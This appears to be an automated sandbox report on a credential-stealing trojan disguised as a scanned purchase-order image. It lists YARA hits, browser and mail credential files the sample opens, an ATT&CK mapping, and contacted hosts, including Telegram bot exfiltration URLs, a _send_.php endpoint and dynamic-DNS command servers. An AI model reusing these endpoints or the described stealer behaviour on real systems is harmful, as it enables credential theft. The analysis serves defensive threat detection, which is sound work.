                  Source: Yara match File source: Process Memory Space: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe PID: 1260, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: HJnkiZjAPsec.exe PID: 7260, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: HJnkiZjAPsec.exe PID: 7448, type: MEMORYSTR
                  Source: Yara match File source: 8.2.HJnkiZjAPsec.exe.47369f0.3.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.HJnkiZjAPsec.exe.4779410.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4cf2330.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.HJnkiZjAPsec.exe.4779410.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.HJnkiZjAPsec.exe.47369f0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.4128482963.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.4132369730.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.4132447999.0000000002CAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.1781171636.00000000046A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1733478686.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe PID: 5824, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: HJnkiZjAPsec.exe PID: 7260, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: HJnkiZjAPsec.exe PID: 7448, type: MEMORYSTR
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe; File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe; File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

                  Remote Access Functionality

                  MITRE ATT&CK Matrix (techniques listed per tactic, in matrix order; a leading number is the count shown in that matrix cell, unnumbered techniques are the matrix's empty cells)

                  Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
                  Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
                  Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
                  Execution: 1 Native API; 1 Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
                  Persistence: 1 DLL Side-Loading; 1 Scheduled Task/Job; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                  Privilege Escalation: 1 DLL Side-Loading; 111 Process Injection; 1 Scheduled Task/Job; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                  Defense Evasion: 11 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 31 Virtualization/Sandbox Evasion; 111 Process Injection
                  Credential Access: 1 OS Credential Dumping; 1 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
                  Discovery: 1 File and Directory Discovery; 13 System Information Discovery; 1 Query Registry; 11 Security Software Discovery; 1 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery
                  Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
                  Collection: 11 Archive Collected Data; 1 Data from Local System; 1 Screen Capture; 1 Email Collection; 1 Input Capture; GUI Input Capture; Web Portal Capture; Credential API Hooking
                  Command and Control: 1 Web Service; 3 Ingress Tool Transfer; 11 Encrypted Channel; 1 Non-Standard Port; 3 Non-Application Layer Protocol; 24 Application Layer Protocol; Commonly Used Port; Application Layer Protocol
                  Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
                  Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
                  Behavior Graph (ID: 1541880; Sample: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe; Startdate: 25/10/2024; Architecture: WINDOWS; Score: 100)

                  Start
                    Network: reallyfreegeoip.org (Tries to detect the country of the analysis system (by using the IP)); api.telegram.org (Uses the Telegram API (likely for C&C communication)); 4 other IPs or domains
                    Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; 17 other signatures
                    Started: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe; HJnkiZjAPsec.exe

                  Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
                    Dropped: C:\Users\user\AppData\...\HJnkiZjAPsec.exe (PE32); C:\Users\...\HJnkiZjAPsec.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\tmpB8C6.tmp (XML); Scan_Rev 20220731_...882874_JPEG.exe.log (ASCII)
                    Signatures: Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
                    Started: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe; powershell.exe; schtasks.exe
                      Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe (second instance)
                        Network: api.telegram.org 149.154.167.220, 443, 49770, 49778 (TELEGRAMRU, United Kingdom); kafs.co.ug 104.243.33.38, 49779, 49780, 587 (RELIABLESITEUS, United States); 2 other IPs or domains
                      powershell.exe
                        Signatures: Loading BitLocker PowerShell Module
                        Started: WmiPrvSE.exe; conhost.exe
                      schtasks.exe
                        Started: conhost.exe

                  HJnkiZjAPsec.exe
                    Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
                    Started: HJnkiZjAPsec.exe; schtasks.exe
                      HJnkiZjAPsec.exe (second instance)
                        Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)
                      schtasks.exe
                        Started: conhost.exe

                  Source | Detection | Scanner | Label
                  Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | 50% | ReversingLabs | Win32.Trojan.CrypterX
                  Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | 100% | Avira | HEUR/AGEN.1304549
                  Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | 100% | Joe Sandbox ML |
                  Source | Detection | Scanner | Label
                  C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe | 100% | Avira | HEUR/AGEN.1304549
                  C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe | 100% | Joe Sandbox ML |
                  C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe | 50% | ReversingLabs | Win32.Trojan.CrypterX
                  No Antivirus matches
                  No Antivirus matches
                  Name | IP | Active | Malicious | Antivirus Detection | Reputation
                  kafs.co.ug | 104.243.33.38 | true | true | | unknown
                  reallyfreegeoip.org | 188.114.97.3 | true | true | | unknown
                  api.telegram.org | 149.154.167.220 | true | true | | unknown
                  checkip.dyndns.com | 193.122.130.0 | true | false | | unknown
                  mail.kafs.co.ug | unknown | unknown | true | | unknown
                  checkip.dyndns.org | unknown | unknown | true | | unknown
                  Name | Malicious | Antivirus Detection | Reputation
                  http://checkip.dyndns.org/ | false | URL Reputation: safe | unknown
                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20and%20Time:%2025/10/2024%20/%2019:19:15%0D%0ACountry%20Name:%20United%20States%0D%0A[%20927537%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] | false | | unknown
                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20and%20Time:%2025/10/2024%20/%2020:37:54%0D%0ACountry%20Name:%20United%20States%0D%0A[%20927537%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] | false | | unknown
                  https://reallyfreegeoip.org/xml/173.254.250.81 | false | | unknown
                  Name | Source | Malicious | Antivirus Detection | Reputation
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://x1.c.lencr.org/0Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4130484840.0000000000EBC000.00000004.00000020.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4144722830.0000000006328000.00000004.00000020.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4145363700.000000000628D000.00000004.00000020.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4129499108.0000000000F3A000.00000004.00000020.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://x1.i.lencr.org/0Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4130484840.0000000000EBC000.00000004.00000020.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4144722830.0000000006328000.00000004.00000020.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4145363700.000000000628D000.00000004.00000020.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4129499108.0000000000F3A000.00000004.00000020.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://reallyfreegeoip.org/xml/173.254.250.81$Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002D7A000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002C5F000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002C87000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002C1A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003F88000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003DE4000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003F5D000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003E2E000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000004081000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003DFD000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003E28000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003C59000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003F20000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003C84000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://checkip.dyndns.org/qScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1733478686.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 00000008.00000002.1781171636.00000000046A7000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4128482963.0000000000432000.00000040.00000400.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://chrome.google.com/webstore?hl=enlBScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002D5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        unknown
                                                        http://www.galapagosdesign.com/DPleaseScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.fonts.comScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.sandoll.co.krScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.urwpp.deDPleaseScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.zhongyicts.com.cnScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://mail.kafs.co.ugdScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002E8D000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002CAB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          unknown
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1732669565.0000000003490000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 00000008.00000002.1779228796.0000000002E60000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.sakkal.comScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://r11.i.lencr.org/0#Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4129429491.0000000000E06000.00000004.00000020.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4144722830.0000000006328000.00000004.00000020.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4145363700.000000000628D000.00000004.00000020.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4129499108.0000000000F3A000.00000004.00000020.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://reallyfreegeoip.org/xml/Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1733478686.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002D50000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 00000008.00000002.1781171636.00000000046A7000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4128482963.0000000000432000.00000040.00000400.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://www.office.com/HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002D95000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002CAB000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002D86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              unknown
                                                              http://www.apache.org/licenses/LICENSE-2.0Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                unknown
                                                                http://www.fontbureau.comScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://r11.o.lencr.org0#Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4129429491.0000000000E06000.00000004.00000020.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4144722830.0000000006328000.00000004.00000020.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4145363700.000000000628D000.00000004.00000020.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4129499108.0000000000F3A000.00000004.00000020.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://chrome.google.com/webstore?hl=enHScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002EB4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    http://checkip.dyndns.orgScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003E2C000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.00000000040A5000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003F82000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003E53000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003FD0000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003DDE000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003C7E000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003E22000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003CCC000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002CAB000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003F45000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003CF3000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003E70000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://api.telegram.org/bot/sendMessage?chat_id=&text=Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002C87000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://www.chiark.greenend.org.uk/~sgtatham/putty/0Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, HJnkiZjAPsec.exe.0.drfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.carterandcone.comlScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://aborters.duckdns.org:8081Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1733478686.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 00000008.00000002.1781171636.00000000046A7000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4128482963.0000000000432000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        http://www.fontbureau.com/designers/cabarga.htmlNScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://www.founder.com.cn/cnScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://www.fontbureau.com/designers/frere-user.htmlScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://51.38.247.67:8081/_send_.php?LScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002CAB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          http://anotherarmy.dns.army:8081Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1733478686.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 00000008.00000002.1781171636.00000000046A7000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4128482963.0000000000432000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            http://www.jiyu-kobo.co.jp/Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://reallyfreegeoip.orgScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002D50000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002C5F000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002C87000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
